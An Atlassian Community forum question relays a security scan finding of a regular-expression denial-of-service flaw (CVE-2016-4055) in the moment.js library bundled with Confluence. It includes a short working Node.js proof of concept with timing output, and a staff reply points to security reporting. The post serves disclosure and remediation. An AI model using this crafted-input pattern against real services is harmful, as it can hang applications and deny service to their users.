Confluence Security Weakness Sonatype CWE: 400

Hi,

Our security team performed a security scan on Confluence 6.21 and found a security issue and the detials are provided below. We could only adopt for production use, if that risk is addressed by Atlassian. Our procurement department is waiting for us to obtain a mitigating solution for this issue, before they procure Confluence. 

 

Severity Sonatype CVSS 3.0: 7.5

Weakness Sonatype CWE: 400

Explanation The moment package is vulnerable to a Regular Expression Denial of Service (ReDoS). The moment.duration() method in moment.js contains a regular expression, used to determine if an input is of the ASP.NET date format, that can cause an application to hang. The aspNetRegex, the variable's name in the code, causes very slow processing of exponentially long repetitive sequences leading to a Denial of Service (DoS) due to excessive resource consumption. A remote attacker could exploit this flaw by supplying a specially crafted request URL containing long repetitive sequences to cause the denial of service (DoS). "

Proof of concept:

var moment = require('moment');  

var genstr = function (len, chr) {      var result = "";     

for (i=0; i<=len; i++) {          result = result + chr;      }        return result; }     for (i=20000;i<=10000000;i=i+10000) {      console.log("COUNT: " + i);     

var str = '-' + genstr(i, '1')      console.log("LENGTH: " + str.length);      var start = process.hrtime();      moment.duration(str)        var end = process.hrtime(start);      console.log(end); }      

Results $ node moment.js COUNT: 20000 LENGTH: 20002 [ 0, 618931029 ] COUNT: 30001 LENGTH: 30003 [ 1, 401413894 ] COUNT: 40002 LENGTH: 40004 [ 2, 437075303 ] COUNT: 50003 LENGTH: 50005 [ 3, 824664804 ] COUNT: 60004 LENGTH: 60006 [ 5, 651335262 ] "

Reference Link: https://nodesecurity.io/advisories/55 Note: CVE-2016-4055 has been assigned to this vulnerability. Detection The application is vulnerable by using this package. Recommendation We recommend upgrading to a version of this component that is not vulnerable to this specific issue. Categories Data

Root Cause moment : 2.5.0

Advisories Project: https://nodesecurity.io/advisories/55  

1 answer

0 vote
Ann Worley Atlassian Team Aug 21, 2017

Our security team has asked me to direct you to How to Report a Security Issue.

It would be great if you could follow up on this forum to let the Community know the result.

Suggest an answer

Log in or Sign up to answer
Atlassian Community Anniversary

Happy Anniversary, Atlassian Community!

This community is celebrating its one-year anniversary and Atlassian co-founder Mike Cannon-Brookes has all the feels.

Read more
Community showcase
Kesha Thillainayagam
Posted Apr 13, 2018 in Confluence

We want to hear how your non-technical teams are using Confluence!

Hi Community! Kesha (kay-sha) from the Confluence marketing team here! Can you share stories with us on how your non-technical (think Marketing, Sales, HR, legal, etc.) teams are using Confluen...

2,927 views 27 12
Join discussion

Atlassian User Groups

Connect with like-minded Atlassian users at free events near you!

Find a group

Connect with like-minded Atlassian users at free events near you!

Find my local user group

Unfortunately there are no AUG chapters near you at the moment.

Start an AUG

You're one step closer to meeting fellow Atlassian users at your local meet up. Learn more about AUGs

Groups near you